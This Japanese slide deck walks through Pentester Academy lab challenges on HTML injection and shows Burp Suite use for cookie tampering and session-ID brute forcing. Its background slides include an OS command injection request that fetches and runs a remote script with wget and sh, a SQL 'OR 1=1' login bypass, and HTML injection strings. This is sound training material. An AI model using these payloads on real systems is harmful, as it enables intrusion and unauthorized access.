SlideShare a Scribd company logo
1 of 40
1 /40
長谷川
2 /40
1. Webアプリのペネトレーションテストのスキルアップ
ペンテスト(侵入テスト)のMOOCサイトの問題をガンガン解いていきます。
http://www.pentesteracademy.com/
その1.pptx Challenge 1 ~ Challenge 7 : 認証突破
その2.pptx Challenge 8 ~ Challenge 11 : セッションID突破
その3.pptx Challenge 12 ~ Challenge 15 : トラフィック解析
その4.pptx Challenge 16 ~ Challenge 19 : HTML injection
その5.pptx Challenge 20 ~ Challenge 36 : XSS
その6.pptx以降 Unvalidated Redirects、CSRF
つづく
Wikipediaより
Massive Open Online Course (MOOC、ムーク) はインターネッ
ト上で誰もが無料で受講できる大規模な開かれた講義のことである。
3 /40
 ツール、言語
◦ Burp Suite
※使用頻度の高いBurp Suiteの詳細説明をします。
※その他のツールの説明はその1.pptx~その3.pptx 参照。
 HTML injection(予備知識)
 問題 & 解き方 & 解答
4 /404
Pentester Academyの無料の問題からいくつか出題
ツール使うか、プログラミングして解いてください。
ツール:Hydra、Metasploit、IronWASP、ZAPなどなど、、
Pythonとかでも解けます。
5 /40
 プロキシ型のWAPツール。
◦ Burp Proxy ※よく使うので説明します。
 ブラウザ-target アプリケーション間のMITM。Requestの修正等ができる。
◦ Burp Spider
 トラフィックの調査、脆弱性の発見等。
◦ Burp Web Vulnerability Scanner
 脆弱性のチェック。
◦ Burp Sequencer
 シーケンス番号のランダム性のチェック。
などなど
 便利なところ
◦ 勝手にチェックしてくれる。大体何でもできる。
 イマイチなところ
◦ フリー版は機能制限あり。
画面
Webブラウザ Burp Proxy Webサーバー
修正
6 /40
その3.pptx Challenge 8より
http://pentesteracademylab.appspot.com//lab/webapp/cookie/1
この問題を解くためにはrequestで送信するCookieを書き換える必要がある。
Webブラウザ Burp Proxy Webサーバー
書き換え
HTTP:
Cookie:user_id=TUE9PQ==
HTTP:
Cookie:user_id=TVE9PQ==
7 /40
①[Proxy]⇒[Options]でプロキシ設定。
ここで設定したIP、PortでBurp Proxyがローカルプロキシとして動作する。
8 /40
②ブラウザ側のプロキシ設定(IEの場合)。
Burp Proxyで設定したローカルプロキシを設定する。
9 /40
③[Intercept]をONにする。
ブラウザのInterceptが開始する。
Forward:転送する、Drop:ドロップする、Action:様々なアクションをする
書き換え
10 /40
④[Raw]のパラメーターを修正して[Forward]で転送する。
クラック成功!
Request書き換え成功
11 /40
その3.pptx Challenge 10より
http://pentesteracademylab.appspot.com/lab/webapp/sid/2
この問題を解くためにはセッションIDに対してブルートフォース攻撃する必要がある。
Webブラウザ Burp Proxy Webサーバー
ブルートフォース攻撃
HTTP:
Request (セッションID=1000)
元のrequestをもとにブルートフォース攻撃
HTTP:
Request (セッションID=1000)
Request (セッションID=1001)
Request (セッションID=1002)
~省略~
Request (セッションID=1998)
Request (セッションID=1999)
12 /40
①~③はユースケース①と同じ。
④ [Intercept]をONにする。
ブラウザのInterceptが開始する。
Action:様々なアクションをする ⇒ Send to Intruder
※Burp Intruder:様々な攻撃をするツール。
ブルートフォース攻撃対象のセッションID。
13 /40
⑤ [Intruder]にrequestが移動する。
ブルートフォース攻撃対象の変数($$で囲まれている)が問題ないか確認。
追加、削除もできる。
今回は1000~1999まで変化させたいので、1$sid$とする。
次スライドの[Payloads]設定で$sid$を000~999にする。
14 /40
⑥ [Payloads]でPayload typeにBrute forcerを選択。
Character setに「0~9」、Min lengthに「3」、Max lengthに「3」を選択。
Start attackを選択。
15 /40
⑦ ブルートフォース攻撃が開始する。
パケットのLength、中身、エクスポート結果等から正解のパケットを探す。
クラック成功!
セッションID=1089が正解。
ユースケース①と同様の方法で
セッションID=1089のrequestを送信。
16 /40
 情報収集:Reconnaissance
◦ 情報を収集する。(データフロー、フィンガープリント、ソース)
 Wireshark、Blind Elephant、httprint
 マッピング:Mapping
◦ ターゲットアプリケーションの検査。
 Burp Spider、SprAJAX、WebScarab
 発見:Discovery
◦ ターゲットアプリケーションの脆弱性の発見。
 エクスプロイト:Exploit
◦ 脆弱性を実証する。
SANS SEC542より
17 /4017
Challenge 16 ~ Challenge 19
18 /40
 Injection : 注入。
 Injection攻撃 = プログラムに攻撃コードを注入する攻撃。
 代表的なinjection攻撃
◦ OSコマンド injection
 クライアントのrequestからOSコマンドを組み立てるプログラムへの攻撃。
◦ HTML injection
 クライアントのrequestからWebページを組み立てるプログラムへの攻撃。
◦ SQL injection
 クライアントのrequestからSQL文を組み立てるプログラムへの攻撃。
19 /40
 クライアントのrequestからOSコマンドを組み立てるプログラムへの攻撃
・アプリケーション
$address = param{'address'}; #requestからe-mailアドレスを取得
$message = "message.txt"; #送信するメッセージが格納されたファイル
system("sendmail $address < $message"); #sendmailコマンドでメール送信
・攻撃者のRequest
address=example@hoge.jp </dev/null; wget http://site/badscript; sh badscript #
・実行されるOSコマンド $addressに上記のrequestが設定される
sendmail example@hoge.jp < /dev/null; #適当なアドレスにメール送信
wget http://site/badscript.sh #攻撃コードのダウンロード
sh badscript.sh #攻撃コードの実行
攻撃者
Webサーバー
アプリケーション シェル
Request
(攻撃コード)
Requestの加工 OSコマンドの実行
例)Requestされたメールを送信するPerlアプリケーションへの攻撃
20 /40
 クライアントのrequestからHTMLを組み立てるプログラムへの攻撃
 HTML injectionには様々な種類がある。
 スクリプト injection
 JavaScript等に攻撃コードを注入する。応用例にXSSがある。
 フレーム injection
 Frameに攻撃コードを注入する。昔のIEではframeはノーチェックだったらしい。
 コンテンツ injection
 生成されるコンテンツに攻撃コードを注入する。
実例は問題を解いて確認する。
攻撃者
Webサーバー
アプリケーション
Request
(攻撃コード)
Requestの加工
21 /40
 クライアントのrequestからSQL文を組み立てるプログラムへの攻撃
・アプリケーション+SQL
Requestで受信したuser/pwに合致するuserをdatabaseから参照する。
SELECT user database WHERE user='param{'user'}' AND pw='param{'pw'}'
・攻撃者のRequest
user=' OR 1=1 --, pw=hoge
・実行されるSQLコマンド $user/$pwに上記のrequestのuser/pwが設定される
SELECT user database WHERE user='' OR 1=1 –-' AND pw='hoge'
--以降はSQLではコメントとして扱われる。
WHERE以降の条件がOR 1=1で常に真となるため、
適当なパスワードを入れても必ずユーザーID(user)が返ってくる。
攻撃者
Webサーバー
アプリケーション
Request
(攻撃コード)
Requestの加工
SQL文の実行
例)RequestされたユーザーID(user)/パスワード(pw)をデータベースから参照する
SQLサーバー
SQL文
データベース
※説明のため若干簡略化
22 /40
IPAのセキュア・プログラミング講座等を参照。
攻撃手法を学ぶことも重要。
 IPAのセキュア・プログラミング講座
内容は古いが結構参考になる。
https://www.ipa.go.jp/security/awareness/vendor/programmingv2/index.html
 Exploit Database
各種injection攻撃をはじめとした実際の攻撃コードのデータベース。
情報が結構早い。
https://www.exploit-db.com/
23 /40
Challenge 16: HTML Injection
http://pentesteracademylab.appspot.com//lab/webapp/htmli/1
 目的
◦ ページにメッセージを追加する。
◦ 既存のfromを書き換える。
 ヒント(というか注意)
① Challenge Cracked のページは無い。
form
24 /40
 情報収集:Reconnaissance
Email addressにtest1、Passwordにtest2を入力してSign inしてみる。
・URL
http://pentesteracademylab.appspot.com//lab/webapp/htmli/1?email=test1&password=test2
・わかったこと
①GETメソッドを使用している
⇒ソース、URL、パケットキャプチャで確認。
②GETメソッドのパラメーター(前のrequest)
「email」をEmailの入力欄に表示している。
⇒ソースで確認。
そのままformに表示している
25 /40
 マッピング:Mapping
 発見:Discovery
emailに入れる文字
方針① value=を終端する。
・URL
http://pentesteracademylab.appspot.com//lab/webapp/htmli/1?email=test1&password=test2
そのままformに表示している
例)
"><br><b>Well done!<br>This challenge has been cracked!</b><!--
email欄に入力してもよいし、
GETメソッドのemailパラメーターに入力してもよい。
26 /40
注入した文字列
27 /40
Challenge 17: HTML Injection II
http://pentesteracademylab.appspot.com//lab/webapp/htmli/2
 目的
◦ <H1>タグで"Vulnerable to HTMLi"を追加。
 ヒント(というか注意)
① Challenge Cracked のページは無い。
攻撃前 攻撃後
※formが1個になっている
28 /40
 情報収集:Reconnaissance
Email addressにtest1、Passwordにtest2を入力してSign inしてみる。
・URL
http://pentesteracademylab.appspot.com//lab/webapp/htmli/2?email=test1&password=test2
・わかったこと
①GETメソッドを使用している
⇒ソース、URL、パケットキャプチャで確認。
②GETメソッドのパラメーター(前のrequest)
「email」「password」を入力欄に表示している。
⇒ソースで確認。
そのままformに表示している
29 /40
 マッピング:Mapping
 発見:Discovery
emailに入れる文字
方針① valueを終端。
方針② 目的の文字列を表示。
方針③ 続くinput formを無効化(コメント化)。
目的(再掲)
• formを1個にする。emailのformは消せないのでpasswordのformを消す。
• <H1>タグで"Vulnerable to HTMLi"を追加。
例)
"><H1>Vulnerable to HTMLi</H1><!–-
30 /40
 マッピング:Mapping
 発見:Discovery
うまくいかない⇒
email password
入力 "><H1>Vulnerable to HTMLi</H1><!–- "><H1>Vulnerable to HTMLi</H1><!–-
Form "><H1>Vulnerable to H (22文字) "><H1>Vulnerable (16文字)
入力文字列とformの値を比較すると、
文字がカットされていることがわかる。
31 /40
 マッピング:Mapping
 発見:Discovery
emailに入れる文字
方針① valueを終端。
方針② 目的の文字列の一部を表示。
方針③ 続くinput formを無効化(コメント化)。
目的(再掲)
• formを1個にする。emailのformは消せないのでpasswordのformを消す。
• <H1>タグで"Vulnerable to HTMLi"を追加。 ⇒文字を分割する必要あり
• emailは22文字以内、passwordは16文字以内
例)
・email(21文字)
"><H1>Vulnerable<!--
・password(16文字)
--> to HTMLi<!--
passwordに入れる文字
方針① コメントを終端。
方針② 目的の文字列の一部を表示。
32 /40
注入した文字列
33 /40
Challenge 18: HTML Injection III
http://pentesteracademylab.appspot.com/lab/webapp/htmli/4
 目的
◦ <H1>タグで"Vulnerable to HTMLi"を追加。
 ヒント(というか注意)
① Challenge Cracked のページは無い。
② EXEファイルを使う
http://demofilespa.s3.amazonaws.com/update.exe
34 /40
 情報収集:Reconnaissance
"http://demofilespa.s3.amazonaws.com/update.exe"でList Stringを実行。
・わかったこと
指定したbinaryファイルの中の3文字以上のテキストを表示している。
(次ページ参照)
35 /40
 情報収集:Reconnaissance
"http://demofilespa.s3.amazonaws.com/update.exe"でList Stringを実行。
Binary Webページ
36 /40
 情報収集:Reconnaissance
"http://demofilespa.s3.amazonaws.com/update.exe"でList Stringを実行。
ソース
テキストを羅列しているだけ。
37 /40
 マッピング:Mapping
 発見:Discovery
Binaryファイルに"Vulnerable to HTMLi"を追加。
作ったbinaryファイルを直リンクできるアップローダー(AWS、dropbox等)にアップロード。
38 /40
注入した文字列
アップしたbinaryファイル
39 /40
Challenge 19: HTML Injection IV
http://pentesteracademylab.appspot.com/lab/webapp/htmli/3
 目的
◦ <H1>タグで"Vulnerable to HTMLi"を追加。
 ヒント(というか注意)
① Challenge Cracked のページは無い。
40 /40
指定したJpegファイルのExifを表示するページなので、JpegのExifに攻撃コードを注入
すればよい。
しかし、サーバー側のアプリケーションが壊れているみたいで正常に動作しない。
動画の解説ページ
https://www.youtube.com/watch?v=hvsJdBSi-RU
こんな感じでExifの適当なフィールドに攻撃コードを注入します。

More Related Content

Viewers also liked

ネットワークの紹介+苦労話
ネットワークの紹介+苦労話ネットワークの紹介+苦労話
ネットワークの紹介+苦労話Tetsuya Hasegawa
 
ClickでCLIをお手軽につくるぅぅぅ
ClickでCLIをお手軽につくるぅぅぅClickでCLIをお手軽につくるぅぅぅ
ClickでCLIをお手軽につくるぅぅぅKazufumi Ohkawa
 
World`s Most Expensive Cyber Security Breach
World`s Most Expensive Cyber Security BreachWorld`s Most Expensive Cyber Security Breach
World`s Most Expensive Cyber Security BreachClickSSL
 
pythonでオフィス快適化計画
pythonでオフィス快適化計画pythonでオフィス快適化計画
pythonでオフィス快適化計画Kazufumi Ohkawa
 
Extract Network and System resource for analysis of Network Security Modeling
Extract Network and System resource for analysis of Network Security ModelingExtract Network and System resource for analysis of Network Security Modeling
Extract Network and System resource for analysis of Network Security ModelingDhiraj Gajurel
 
DNSの運用を考える
DNSの運用を考えるDNSの運用を考える
DNSの運用を考えるaeoe
 

Viewers also liked (6)

ネットワークの紹介+苦労話
ネットワークの紹介+苦労話ネットワークの紹介+苦労話
ネットワークの紹介+苦労話
 
ClickでCLIをお手軽につくるぅぅぅ
ClickでCLIをお手軽につくるぅぅぅClickでCLIをお手軽につくるぅぅぅ
ClickでCLIをお手軽につくるぅぅぅ
 
World`s Most Expensive Cyber Security Breach
World`s Most Expensive Cyber Security BreachWorld`s Most Expensive Cyber Security Breach
World`s Most Expensive Cyber Security Breach
 
pythonでオフィス快適化計画
pythonでオフィス快適化計画pythonでオフィス快適化計画
pythonでオフィス快適化計画
 
Extract Network and System resource for analysis of Network Security Modeling
Extract Network and System resource for analysis of Network Security ModelingExtract Network and System resource for analysis of Network Security Modeling
Extract Network and System resource for analysis of Network Security Modeling
 
DNSの運用を考える
DNSの運用を考えるDNSの運用を考える
DNSの運用を考える
 

Similar to Web applicationpenetrationtest その4

Blojsom におけるクロスサイトスクリプティングの脆弱性
Blojsom におけるクロスサイトスクリプティングの脆弱性Blojsom におけるクロスサイトスクリプティングの脆弱性
Blojsom におけるクロスサイトスクリプティングの脆弱性JPCERT Coordination Center
 
これからHTML5を書く人のためのセキュリティ - HTML5など勉強会
これからHTML5を書く人のためのセキュリティ - HTML5など勉強会これからHTML5を書く人のためのセキュリティ - HTML5など勉強会
これからHTML5を書く人のためのセキュリティ - HTML5など勉強会yoshinori matsumoto
 
テスト駆動で行うネットワーク自動化のすすめ
テスト駆動で行うネットワーク自動化のすすめテスト駆動で行うネットワーク自動化のすすめ
テスト駆動で行うネットワーク自動化のすすめkinunori
 
Application Architecture for Enterprise Win Store Apps with DDD Pattern
Application Architecture for Enterprise Win Store Apps with DDD PatternApplication Architecture for Enterprise Win Store Apps with DDD Pattern
Application Architecture for Enterprise Win Store Apps with DDD PatternAtsushi Kambara
 
第9回勉強会 Webセキュリティー
第9回勉強会 Webセキュリティー第9回勉強会 Webセキュリティー
第9回勉強会 Webセキュリティーhakoika-itwg
 
TypeScript ファースト ステップ (v.0.9 対応版) ~ Any browser. Any host. Any OS. Open Sourc...
TypeScript ファースト ステップ (v.0.9 対応版) ~ Any browser. Any host. Any OS. Open Sourc...TypeScript ファースト ステップ (v.0.9 対応版) ~ Any browser. Any host. Any OS. Open Sourc...
TypeScript ファースト ステップ (v.0.9 対応版) ~ Any browser. Any host. Any OS. Open Sourc...Akira Inoue
 
Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性
Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性
Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性JPCERT Coordination Center
 
次世代プラットフォームのセキュリティモデル考察(前編)
次世代プラットフォームのセキュリティモデル考察(前編)次世代プラットフォームのセキュリティモデル考察(前編)
次世代プラットフォームのセキュリティモデル考察(前編)Yosuke HASEGAWA
 
ライブコーディングとデモで理解するWebセキュリティの基礎
ライブコーディングとデモで理解するWebセキュリティの基礎ライブコーディングとデモで理解するWebセキュリティの基礎
ライブコーディングとデモで理解するWebセキュリティの基礎Takahisa Kishiya
 
機械学習でWebアプリの脆弱性を見つける - Reflected XSS 編 -
機械学習でWebアプリの脆弱性を見つける - Reflected XSS 編 -機械学習でWebアプリの脆弱性を見つける - Reflected XSS 編 -
機械学習でWebアプリの脆弱性を見つける - Reflected XSS 編 -Isao Takaesu
 
徳丸本に学ぶ 安全なPHPアプリ開発の鉄則2012
徳丸本に学ぶ 安全なPHPアプリ開発の鉄則2012徳丸本に学ぶ 安全なPHPアプリ開発の鉄則2012
徳丸本に学ぶ 安全なPHPアプリ開発の鉄則2012Hiroshi Tokumaru
 
Web担当者が知っておくべきPHPとセキュリティ
Web担当者が知っておくべきPHPとセキュリティWeb担当者が知っておくべきPHPとセキュリティ
Web担当者が知っておくべきPHPとセキュリティYasuo Ohgaki
 
20151114 _html5無料セミナー(OSC2015徳島)
20151114 _html5無料セミナー(OSC2015徳島)20151114 _html5無料セミナー(OSC2015徳島)
20151114 _html5無料セミナー(OSC2015徳島)Takahiro Kujirai
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...CODE BLUE
 
jQuery と MVC で実践する標準志向 Web 開発
jQuery と MVC で実践する標準志向 Web 開発jQuery と MVC で実践する標準志向 Web 開発
jQuery と MVC で実践する標準志向 Web 開発Akira Inoue
 
ぼくのかんがえたさいきょうのうぇぶあぷりけーしょんふれーむわーく - YAPC Asia 2011
ぼくのかんがえたさいきょうのうぇぶあぷりけーしょんふれーむわーく - YAPC Asia 2011ぼくのかんがえたさいきょうのうぇぶあぷりけーしょんふれーむわーく - YAPC Asia 2011
ぼくのかんがえたさいきょうのうぇぶあぷりけーしょんふれーむわーく - YAPC Asia 2011Hiroh Satoh
 
マイクロソフトWeb開発の今と今後
マイクロソフトWeb開発の今と今後マイクロソフトWeb開発の今と今後
マイクロソフトWeb開発の今と今後Akira Inoue
 
Ptengine の解析コードについてのご説明
Ptengine の解析コードについてのご説明Ptengine の解析コードについてのご説明
Ptengine の解析コードについてのご説明Ptmind_jp
 
Windows ストアアプリを HTMLで作成する
Windows ストアアプリをHTMLで作成するWindows ストアアプリをHTMLで作成する
Windows ストアアプリを HTMLで作成するNarami Kiyokura
 
ちゃんとした C# プログラムを書けるようになる実践的な方法~ Visual Studio を使った 高品質・低コスト・保守性の高い開発
ちゃんとした C# プログラムを書けるようになる実践的な方法~ Visual Studio を使った 高品質・低コスト・保守性の高い開発ちゃんとした C# プログラムを書けるようになる実践的な方法~ Visual Studio を使った 高品質・低コスト・保守性の高い開発
ちゃんとした C# プログラムを書けるようになる実践的な方法~ Visual Studio を使った 高品質・低コスト・保守性の高い開発慎一 古賀
 

Similar to Web applicationpenetrationtest その4 (20)

Blojsom におけるクロスサイトスクリプティングの脆弱性
Blojsom におけるクロスサイトスクリプティングの脆弱性Blojsom におけるクロスサイトスクリプティングの脆弱性
Blojsom におけるクロスサイトスクリプティングの脆弱性
 
これからHTML5を書く人のためのセキュリティ - HTML5など勉強会
これからHTML5を書く人のためのセキュリティ - HTML5など勉強会これからHTML5を書く人のためのセキュリティ - HTML5など勉強会
これからHTML5を書く人のためのセキュリティ - HTML5など勉強会
 
テスト駆動で行うネットワーク自動化のすすめ
テスト駆動で行うネットワーク自動化のすすめテスト駆動で行うネットワーク自動化のすすめ
テスト駆動で行うネットワーク自動化のすすめ
 
Application Architecture for Enterprise Win Store Apps with DDD Pattern
Application Architecture for Enterprise Win Store Apps with DDD PatternApplication Architecture for Enterprise Win Store Apps with DDD Pattern
Application Architecture for Enterprise Win Store Apps with DDD Pattern
 
第9回勉強会 Webセキュリティー
第9回勉強会 Webセキュリティー第9回勉強会 Webセキュリティー
第9回勉強会 Webセキュリティー
 
TypeScript ファースト ステップ (v.0.9 対応版) ~ Any browser. Any host. Any OS. Open Sourc...
TypeScript ファースト ステップ (v.0.9 対応版) ~ Any browser. Any host. Any OS. Open Sourc...TypeScript ファースト ステップ (v.0.9 対応版) ~ Any browser. Any host. Any OS. Open Sourc...
TypeScript ファースト ステップ (v.0.9 対応版) ~ Any browser. Any host. Any OS. Open Sourc...
 
Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性
Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性
Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性
 
次世代プラットフォームのセキュリティモデル考察(前編)
次世代プラットフォームのセキュリティモデル考察(前編)次世代プラットフォームのセキュリティモデル考察(前編)
次世代プラットフォームのセキュリティモデル考察(前編)
 
ライブコーディングとデモで理解するWebセキュリティの基礎
ライブコーディングとデモで理解するWebセキュリティの基礎ライブコーディングとデモで理解するWebセキュリティの基礎
ライブコーディングとデモで理解するWebセキュリティの基礎
 
機械学習でWebアプリの脆弱性を見つける - Reflected XSS 編 -
機械学習でWebアプリの脆弱性を見つける - Reflected XSS 編 -機械学習でWebアプリの脆弱性を見つける - Reflected XSS 編 -
機械学習でWebアプリの脆弱性を見つける - Reflected XSS 編 -
 
徳丸本に学ぶ 安全なPHPアプリ開発の鉄則2012
徳丸本に学ぶ 安全なPHPアプリ開発の鉄則2012徳丸本に学ぶ 安全なPHPアプリ開発の鉄則2012
徳丸本に学ぶ 安全なPHPアプリ開発の鉄則2012
 
Web担当者が知っておくべきPHPとセキュリティ
Web担当者が知っておくべきPHPとセキュリティWeb担当者が知っておくべきPHPとセキュリティ
Web担当者が知っておくべきPHPとセキュリティ
 
20151114 _html5無料セミナー(OSC2015徳島)
20151114 _html5無料セミナー(OSC2015徳島)20151114 _html5無料セミナー(OSC2015徳島)
20151114 _html5無料セミナー(OSC2015徳島)
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
 
jQuery と MVC で実践する標準志向 Web 開発
jQuery と MVC で実践する標準志向 Web 開発jQuery と MVC で実践する標準志向 Web 開発
jQuery と MVC で実践する標準志向 Web 開発
 
ぼくのかんがえたさいきょうのうぇぶあぷりけーしょんふれーむわーく - YAPC Asia 2011
ぼくのかんがえたさいきょうのうぇぶあぷりけーしょんふれーむわーく - YAPC Asia 2011ぼくのかんがえたさいきょうのうぇぶあぷりけーしょんふれーむわーく - YAPC Asia 2011
ぼくのかんがえたさいきょうのうぇぶあぷりけーしょんふれーむわーく - YAPC Asia 2011
 
マイクロソフトWeb開発の今と今後
マイクロソフトWeb開発の今と今後マイクロソフトWeb開発の今と今後
マイクロソフトWeb開発の今と今後
 
Ptengine の解析コードについてのご説明
Ptengine の解析コードについてのご説明Ptengine の解析コードについてのご説明
Ptengine の解析コードについてのご説明
 
Windows ストアアプリを HTMLで作成する
Windows ストアアプリをHTMLで作成するWindows ストアアプリをHTMLで作成する
Windows ストアアプリを HTMLで作成する
 
ちゃんとした C# プログラムを書けるようになる実践的な方法~ Visual Studio を使った 高品質・低コスト・保守性の高い開発
ちゃんとした C# プログラムを書けるようになる実践的な方法~ Visual Studio を使った 高品質・低コスト・保守性の高い開発ちゃんとした C# プログラムを書けるようになる実践的な方法~ Visual Studio を使った 高品質・低コスト・保守性の高い開発
ちゃんとした C# プログラムを書けるようになる実践的な方法~ Visual Studio を使った 高品質・低コスト・保守性の高い開発
 

More from Tetsuya Hasegawa

CVE-2021-3156 Baron samedit (sudoの脆弱性)
CVE-2021-3156 Baron samedit (sudoの脆弱性)CVE-2021-3156 Baron samedit (sudoの脆弱性)
CVE-2021-3156 Baron samedit (sudoの脆弱性)Tetsuya Hasegawa
 
RFC8528(YANG Schema Mount)の勉強資料
RFC8528(YANG Schema Mount)の勉強資料RFC8528(YANG Schema Mount)の勉強資料
RFC8528(YANG Schema Mount)の勉強資料Tetsuya Hasegawa
 
RFC7951(JSON Encoding of Data Modeled with YANG)の勉強資料
RFC7951(JSON Encoding of Data Modeled with YANG)の勉強資料RFC7951(JSON Encoding of Data Modeled with YANG)の勉強資料
RFC7951(JSON Encoding of Data Modeled with YANG)の勉強資料Tetsuya Hasegawa
 
RFC7589(NETCONF Protocol over TLS)の勉強資料
RFC7589(NETCONF Protocol over TLS)の勉強資料RFC7589(NETCONF Protocol over TLS)の勉強資料
RFC7589(NETCONF Protocol over TLS)の勉強資料Tetsuya Hasegawa
 
RFC8632(A YANG Data Model for Alarm Management)の勉強資料
RFC8632(A YANG Data Model for Alarm Management)の勉強資料RFC8632(A YANG Data Model for Alarm Management)の勉強資料
RFC8632(A YANG Data Model for Alarm Management)の勉強資料Tetsuya Hasegawa
 
RFC5717(Partial Lock Remote Procedure Call (RPC) for NETCONF)の勉強資料
RFC5717(Partial Lock Remote Procedure Call (RPC) for NETCONF)の勉強資料RFC5717(Partial Lock Remote Procedure Call (RPC) for NETCONF)の勉強資料
RFC5717(Partial Lock Remote Procedure Call (RPC) for NETCONF)の勉強資料Tetsuya Hasegawa
 
RFC8341(Network Configuration Access Control Model)の勉強資料。
RFC8341(Network Configuration Access Control Model)の勉強資料。RFC8341(Network Configuration Access Control Model)の勉強資料。
RFC8341(Network Configuration Access Control Model)の勉強資料。Tetsuya Hasegawa
 
RFC8525(YANG Library)の勉強資料。
RFC8525(YANG Library)の勉強資料。RFC8525(YANG Library)の勉強資料。
RFC8525(YANG Library)の勉強資料。Tetsuya Hasegawa
 
3GPP F1インターフェース(TS38.470-f50)の概要
3GPP F1インターフェース(TS38.470-f50)の概要3GPP F1インターフェース(TS38.470-f50)の概要
3GPP F1インターフェース(TS38.470-f50)の概要Tetsuya Hasegawa
 
RFC8340(YANG Tree Diagrams)の勉強資料
RFC8340(YANG Tree Diagrams)の勉強資料RFC8340(YANG Tree Diagrams)の勉強資料
RFC8340(YANG Tree Diagrams)の勉強資料Tetsuya Hasegawa
 
SSHパケットの復号ツールを作ろう_v1(Decrypt SSH .pcap File)
SSHパケットの復号ツールを作ろう_v1(Decrypt SSH .pcap File)SSHパケットの復号ツールを作ろう_v1(Decrypt SSH .pcap File)
SSHパケットの復号ツールを作ろう_v1(Decrypt SSH .pcap File)Tetsuya Hasegawa
 
RFC8071(NETCONF Call Home and RESTCONF Call Home)の勉強資料
RFC8071(NETCONF Call Home and RESTCONF Call Home)の勉強資料RFC8071(NETCONF Call Home and RESTCONF Call Home)の勉強資料
RFC8071(NETCONF Call Home and RESTCONF Call Home)の勉強資料Tetsuya Hasegawa
 
RFC6243(With-defaults Capability for NETCONF)の勉強資料
RFC6243(With-defaults Capability for NETCONF)の勉強資料RFC6243(With-defaults Capability for NETCONF)の勉強資料
RFC6243(With-defaults Capability for NETCONF)の勉強資料Tetsuya Hasegawa
 
RFC6241(Network Configuration Protocol (NETCONF))の勉強資料
RFC6241(Network Configuration Protocol (NETCONF))の勉強資料RFC6241(Network Configuration Protocol (NETCONF))の勉強資料
RFC6241(Network Configuration Protocol (NETCONF))の勉強資料Tetsuya Hasegawa
 
RFC5277(NETCONF Event Notifications)の勉強資料
RFC5277(NETCONF Event Notifications)の勉強資料RFC5277(NETCONF Event Notifications)の勉強資料
RFC5277(NETCONF Event Notifications)の勉強資料Tetsuya Hasegawa
 
5Gを含む将来ネットワークにおけるAI活用に関する国際標準化動向
5Gを含む将来ネットワークにおけるAI活用に関する国際標準化動向5Gを含む将来ネットワークにおけるAI活用に関する国際標準化動向
5Gを含む将来ネットワークにおけるAI活用に関する国際標準化動向Tetsuya Hasegawa
 
MCPC第5回イノベーションチャレンジセミナーメモ
MCPC第5回イノベーションチャレンジセミナーメモMCPC第5回イノベーションチャレンジセミナーメモ
MCPC第5回イノベーションチャレンジセミナーメモTetsuya Hasegawa
 
3GPP TS 38.300-100まとめ
3GPP TS 38.300-100まとめ3GPP TS 38.300-100まとめ
3GPP TS 38.300-100まとめTetsuya Hasegawa
 
3GPP TR23.711-e00まとめ
3GPP TR23.711-e00まとめ3GPP TR23.711-e00まとめ
3GPP TR23.711-e00まとめTetsuya Hasegawa
 

More from Tetsuya Hasegawa (20)

CVE-2021-3156 Baron samedit (sudoの脆弱性)
CVE-2021-3156 Baron samedit (sudoの脆弱性)CVE-2021-3156 Baron samedit (sudoの脆弱性)
CVE-2021-3156 Baron samedit (sudoの脆弱性)
 
RFC8528(YANG Schema Mount)の勉強資料
RFC8528(YANG Schema Mount)の勉強資料RFC8528(YANG Schema Mount)の勉強資料
RFC8528(YANG Schema Mount)の勉強資料
 
RFC7951(JSON Encoding of Data Modeled with YANG)の勉強資料
RFC7951(JSON Encoding of Data Modeled with YANG)の勉強資料RFC7951(JSON Encoding of Data Modeled with YANG)の勉強資料
RFC7951(JSON Encoding of Data Modeled with YANG)の勉強資料
 
RFC7589(NETCONF Protocol over TLS)の勉強資料
RFC7589(NETCONF Protocol over TLS)の勉強資料RFC7589(NETCONF Protocol over TLS)の勉強資料
RFC7589(NETCONF Protocol over TLS)の勉強資料
 
RFC8632(A YANG Data Model for Alarm Management)の勉強資料
RFC8632(A YANG Data Model for Alarm Management)の勉強資料RFC8632(A YANG Data Model for Alarm Management)の勉強資料
RFC8632(A YANG Data Model for Alarm Management)の勉強資料
 
RFC5717(Partial Lock Remote Procedure Call (RPC) for NETCONF)の勉強資料
RFC5717(Partial Lock Remote Procedure Call (RPC) for NETCONF)の勉強資料RFC5717(Partial Lock Remote Procedure Call (RPC) for NETCONF)の勉強資料
RFC5717(Partial Lock Remote Procedure Call (RPC) for NETCONF)の勉強資料
 
RFC8341(Network Configuration Access Control Model)の勉強資料。
RFC8341(Network Configuration Access Control Model)の勉強資料。RFC8341(Network Configuration Access Control Model)の勉強資料。
RFC8341(Network Configuration Access Control Model)の勉強資料。
 
RFC8525(YANG Library)の勉強資料。
RFC8525(YANG Library)の勉強資料。RFC8525(YANG Library)の勉強資料。
RFC8525(YANG Library)の勉強資料。
 
3GPP F1インターフェース(TS38.470-f50)の概要
3GPP F1インターフェース(TS38.470-f50)の概要3GPP F1インターフェース(TS38.470-f50)の概要
3GPP F1インターフェース(TS38.470-f50)の概要
 
RFC8340(YANG Tree Diagrams)の勉強資料
RFC8340(YANG Tree Diagrams)の勉強資料RFC8340(YANG Tree Diagrams)の勉強資料
RFC8340(YANG Tree Diagrams)の勉強資料
 
SSHパケットの復号ツールを作ろう_v1(Decrypt SSH .pcap File)
